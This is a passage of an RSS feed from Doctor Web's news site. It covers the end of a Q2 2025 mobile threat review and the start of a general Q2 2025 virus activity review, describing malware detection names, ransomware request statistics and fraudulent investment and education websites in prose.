        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/02_unwanted_q2_2025_en.png" alt="Unwanted_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;    
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/03_riskware_q2_2025_en.png" alt="Riskware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files launched with the help of this platform can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/04_adware_q2_2025_en.png" alt="Adware_Stat_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Unwanted ad-displaying software for Android devices that displays a banner showing recommended programs when applications are being installed.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h3&gt;Threats on Google Play&lt;/h3&gt;
    &lt;p&gt;
        Over the course of the second quarter of 2025, Doctor Web’s virus analysts discovered several dozen threats on Google Play, 
        including various fake programs from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family. These trojans were again actively being distributed 
        under the guise of finance-related programs and, instead of the promised functionality, could load fraudulent websites.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/05_Android.FakeApp.1863.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/06_Android.FakeApp.1859.1.png" alt="Android.FakeApp_Q2_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1863&lt;/b&gt; and &lt;b&gt;Android.FakeApp.1859&lt;/b&gt; are examples of the trojans that were discovered. 
        The former was hidden in the “TPAO” app and targeted Turkish users who were told that the app could help them 
        “easily control their deposits and incomes”. The latter was disguised as a “financial assistant” (“Quantum MindPro”) 
        and was geared toward a French-speaking audience.
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Games remain another popular disguise for such fake programs. Under certain conditions, they load online casino and bookmaker websites instead of providing gaming functionality.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/07_Android.FakeApp.1840.1.png" alt="Android.FakeApp_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; (“Pino Bounce”) is one of the fake games that could load an online casino site.
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        In addition, our specialists detected the unwanted ad-displaying software &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;. 
        It was hidden in the &lt;i&gt;“Coin News Promax”&lt;/i&gt; app, which contains informational materials about cryptocurrencies. 
        &lt;b&gt;Adware.Adpush.21912&lt;/b&gt; displays notifications that, when clicked, load the link specified by the C2 server into a WebView.
    &lt;/p&gt;
     &lt;div class="flex fxCenter"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_mobile_q2/08_Adware.Adpush.21912.1.png" alt="Adware.Adpush_Q2_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;
        To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.
    &lt;/p&gt;
&lt;/section&gt;
&lt;br /&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15026&amp;lng=en</guid><title>Doctor Web’s Q2 2025 virus activity review</title><link>https://news.drweb.com/show/?i=15026&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Jul 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;July 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the second quarter of 2025 decreased by 7.38%, compared to the first quarter. At the same time, the number of unique threats decreased by 23.10%. Unwanted adware apps, backdoors, ad-displaying trojans, and malicious scripts were among the threats most commonly detected on protected devices. In email traffic, most frequently detected were trojan downloaders, various malicious scripts, and trojan droppers.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    Users whose files were affected by encoder trojans had mostly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    In April, Doctor Web’s virus analysts reported on a trojan found in the firmware of a number of Android smartphone models. 
    Cybercriminals used this malware to steal cryptocurrency from their victims. In addition, our specialists discovered a trojan 
    that malicious actors embedded into a version of a popular mapping program; it was used to spy on Russian military personnel.
  &lt;/p&gt;
  &lt;p&gt;
    Over the course of the second quarter, our Internet analysts uncovered many new fraudulent websites. 
    Among them were websites of non-existent educational platforms that supposedly allowed potential victims 
    to undergo online training and improve their qualifications. There were also more investment-themed websites promising quick and easy money.
  &lt;/p&gt;
  &lt;p&gt;
    The detection statistics for mobile devices showed a decrease in activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 
    ad-displaying trojans. However, this malware family remains the most widespread Android threat. At the same time, our 
    virus laboratory detected many new threats on Google Play.
  &lt;/p&gt;
  &lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends in Q2 2025&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li&gt;The number of threats detected on protected devices decreased&lt;/li&gt;
      &lt;li&gt;Unique threats used in attacks were detected in decreased numbers&lt;/li&gt;
      &lt;li&gt;Many fraudulent websites, allegedly related to the education sector and finances, emerged&lt;/li&gt;
      &lt;li&gt;A spyware trojan attack targeting Russian military personnel was detected; the attack exploited popular mapping software for Android devices&lt;/li&gt;
      &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of a variety of Android smartphones&lt;/li&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans remain among the most widespread Android threats&lt;/li&gt;
      &lt;li&gt;More malicious and unwanted programs were detected on Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/01_stat_q2_2025_en.png" alt="stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common threats in Q2 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/02_mail_traffic_q2_2025_en.png" alt="mail_traffic_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Win32.HLLW.Rendoc.3&amp;lng=en"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;A network worm that spreads via removable storage media and other channels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;PDF.Phisher.867&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;PDF documents used in phishing newsletters.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h3&gt;Encryption ransomware&lt;/h3&gt;
  &lt;p&gt;
    In Q2 2025, the number of requests made to decrypt files affected by encoder trojans decreased by 14.65%, compared to Q1 2025.
  &lt;/p&gt;
  &lt;p&gt;
    The dynamics of the decryption requests received by Doctor Web’s technical support service:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/03_encoder_requests_q2_2025_en.png" alt="encoder_stat_2025_Q2"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common encoders of Q2 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24.41% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 4.41% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 2.71% of user requests&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h3&gt;Network fraud&lt;/h3&gt;
  &lt;p&gt;
    Over the course of the second quarter, Doctor Web’s Internet analysts detected many fraudulent websites 
    supposedly related to the education sector. Online resources offering training in various professions became widespread. 
    For example, the &lt;i&gt;SMM Академия&lt;/i&gt; (“SMM Academy”) and &lt;i&gt;LearnIT KZ&lt;/i&gt; platforms, designed for Kazakhstani users, 
    supposedly allowed them to “master the SMM manager profession in 3 months” and “become a data analyst”.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/04_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/05_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    On other websites, potential victims were allegedly able to access various courses. Among them were courses for learning English 
    and for gaining capital management skills—from the &lt;i&gt;EnglishPro&lt;/i&gt; and &lt;i&gt;FinCourse&lt;/i&gt; “platforms”, respectively:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/06_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/07_q2_2025_fraud.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    And the fraudulent website of a certain service called &lt;i&gt;Финансовое Образование&lt;/i&gt; (“Financial Education”) could supposedly 
    help users improve their financial literacy. It offered visitors the chance to “master their finances and guarantee their future”:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/08_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    To “access” their advertised services, such websites ask users to register an account by providing personal data, 
    like their name, mobile phone number, email address, etc. Such data accumulates in the criminals’ hands and can 
    later be used in various fraudulent schemes.
  &lt;/p&gt;
  &lt;p&gt;
    At the same time, new fraudulent websites appeared for pseudo-investment projects that cybercriminals often presented 
    as allegedly being related to well-known companies and services. For instance, one offered users the opportunity to become 
    participants in an innovative project based on AI (artificial intelligence) technologies. This “project” was passed off as 
    a service from the Audi automobile concern and supposedly allowed cryptocurrencies to be traded automatically and a guaranteed 
    high income to be received. For “accessing” the service, a starting sum of €250 was required.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/09_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another “investment project” was allegedly related to the &lt;i&gt;TikTok&lt;/i&gt; social network. Visitors to the fraudulent website were 
    asked to complete a short survey and then provide personal information for registering and accessing the promised service:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/10_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Moreover, other fraudulent websites were discovered that were camouflaged as official online resources for the &lt;i&gt;WhatsApp&lt;/i&gt; messenger. 
    One of them offered visitors the opportunity to receive digital coins, each of which “brings the owner €15 a day”. The user supposedly 
    received 160 of these coins, but to begin “earning money on them”, they were asked to register an account by providing personal data. 
    In reality, the potential victim did not get any digital assets, and their data ended up in the hands of the scammers.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/11_q2_2025_fraud_2.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another fake &lt;i&gt;WhatsApp&lt;/i&gt; website supposedly granted access to yet another trading bot, based on some so-called unique developments. 
    Users were asked to “run the &lt;i&gt;WhatsApp Bot&lt;/i&gt; and make money automatically”. For this, they were traditionally required to register 
    by indicating their personal data, which was then transferred to the threat actors.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/12_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fraudsters also targeted users from specific countries. For example, Russian citizens could encounter websites offering them the opportunity 
    to “make their dreams come true” with the help of this or that investment service. Malicious actors utilized the same template to design such 
    websites, only changing the appearance and the names of the non-existent projects.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/13_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    It is noteworthy that websites based on the same template were also created for residents of other countries, for example, Uzbekistan:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/14_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One fraudulent website that was discovered lured Russian-speaking users living in Europe. On this website, 
    cybercriminals promised potential victims a passive income of up to €1000 per week “with the help of innovative, 
